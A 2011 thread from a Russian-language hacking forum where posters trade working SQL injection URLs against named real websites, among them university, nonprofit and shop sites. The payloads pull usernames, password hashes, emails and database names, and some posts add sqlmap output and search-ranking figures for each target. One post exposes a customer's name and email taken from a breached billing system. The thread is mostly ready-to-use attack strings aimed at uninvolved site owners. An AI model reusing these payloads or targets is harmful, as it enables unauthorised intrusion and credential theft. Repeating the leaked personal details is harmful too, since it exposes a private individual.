HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14421  
Старый 19.11.2011, 22:45
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267

Репутация: 84


По умолчанию

Код:
http://libinfo.org/index.php?id=-8787+union+select+1,2,3,4,5,concat_ws%280x0b,name,0x3a,pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users+--+
ТИЦ - 30

PR - 4

Код:
http://www.toramp.com/tnews.php?id=-16%27+union+select+1,2,3,group_concat%280x0b,username,0x3a,passhash%29,5,6,7,8,9,10,11+from+users+--+
 
Ответить с цитированием

  #14422  
Старый 20.11.2011, 16:22
kallstrom
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
292

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://math.ucsd.edu/people/profile.php?id=2020
ТИЦ - 110

PR - 6

[QUOTE="None"]
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL
 
Ответить с цитированием

  #14423  
Старый 20.11.2011, 18:10
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


По умолчанию

Цитата:
Сообщение от None  
http://www.495-irr.ru/ind.php?id_typ=-138+/*!UNION*/+SELECT+1,2,3,4,5,6,/*!table_name*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33+from+information_schema .tables+--+
Логин от админки не нашёл(
 
Ответить с цитированием

  #14424  
Старый 20.11.2011, 23:48
kallstrom
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
292

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.drummajorinstitute.org/library/article.php?ID=5518%20AND%20(SELECT%208461%20FROM( SELECT%20COUNT(*),CONCAT(CHAR(58,121,111,121,58),( SELECT%20MID((IFNULL(CAST(schema_name%20AS%20CHAR) ,CHAR(32))),1,50)%20FROM%20information_schema.SCHE MATA%20LIMIT%201,1),CHAR(58,121,102,112,58),FLOOR( RAND(0)*2))x%20FROM%20information_schema.tables%20 GROUP%20BY%20x)a)
PR 6

тИЦ 10
 
Ответить с цитированием

  #14425  
Старый 21.11.2011, 00:03
kallstrom
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
292

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.zionpark.org/prod.php?id=30%20AND%20(SELECT%201710%20FROM(SELEC T%20COUNT(*),CONCAT(CHAR(58,98,115,99,58),(SELECT% 20MID((IFNULL(CAST(schema_name%20AS%20CHAR),CHAR(3 2))),1,50)%20FROM%20information_schema.SCHEMATA%20 LIMIT%201,1),CHAR(58,120,108,120,58),FLOOR(RAND(0) *2))x%20FROM%20information_schema.tables%20GROUP%2 0BY%20x)a)
PR 5
 
Ответить с цитированием

  #14426  
Старый 21.11.2011, 00:11
kallstrom
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
292

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.loginstitute.ca/moreinfo.php?id=1
PR 6

Цитата:
Сообщение от None  
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1076=1076
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
available databases [1]:[*] logistics_db
 
Ответить с цитированием

  #14427  
Старый 21.11.2011, 00:22
kallstrom
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
292

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.raconline.org/funding/funding_details.php?funding_id=-3817%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL ,%20NULL,%20NULL,%20NULL,%20CONCAT(CHAR(58,109,109 ,106,58),IFNULL(CAST(schema_name%20AS%20CHAR),CHAR (32)),CHAR(58,104,121,111,58)),%20NULL,%20NULL,%20 NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NU LL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL ,%20NULL,%20NULL,%20NULL%20FROM%20information_sche ma.SCHEMATA%20LIMIT%202,1#
PR 7

тИЦ 10
 
Ответить с цитированием

  #14428  
Старый 21.11.2011, 04:45
Drager
Новичок
Регистрация: 02.11.2011
Сообщений: 12
Провел на форуме:
2371

Репутация: 32
По умолчанию

mixfevers.com

Код:
http://www.mixfevers.com/page.php?PageType=-9999999'+UNION+SELECT+1,2,CONCAT_WS('-',USER(),VERSION(),DATABASE())+--+
admin@localhost-5.0.45-mix_pages

...очень много понятных и не очень таблиц, а толку никакого... есть что-то вроде самопальной системы биллинга...

Код:
http://mixfevers.com/clientlogin.php
...в которой "живет" один клиент... =]

ID=1 Trey Alexander delawaredogsupplies@yahoo.com
 
Ответить с цитированием

  #14429  
Старый 21.11.2011, 12:26
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267

Репутация: 84


По умолчанию

Код:
http://www.cryptocrat.com/show_node.php?id=-40%27+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573657273+--+
Код:
http://pisateli.co.ua/page.php?id=-383%27+union+select+1,group_concat%28email,0x3a,password%29,3,4+from+kiev_forum_users+--+
Код:
http://shake.metroland.ru/drink/view_drink.php?id=-6%27+union+select+1,group_concat%28database%28%29,version%28%29,user%28%29%29,3,4,5,6,7+--+
 
Ответить с цитированием

  #14430  
Старый 21.11.2011, 13:40
kallstrom
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
292

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.nmlra.org/store.asp?CatID=-518%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,N ULL,(SELECT%20TOP%201%20CHAR(58)+CHAR(108)+CHAR(11 7)+CHAR(106)+CHAR(58)+ISNULL(CAST(name%20AS%20NVAR CHAR(4000)),CHAR(32))+CHAR(58)+CHAR(113)+CHAR(106) +CHAR(117)+CHAR(58)%20FROM%20master..sysdatabases% 20WHERE%20ISNULL(name,CHAR(32))%20NOT%20IN%20(SELE CT%20TOP%20136%20ISNULL(name,CHAR(32))%20FROM%20ma ster..sysdatabases%20ORDER%20BY%201)%20ORDER%20BY% 201)--
PR=5

TYC=10

Alexa=3,358,182
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.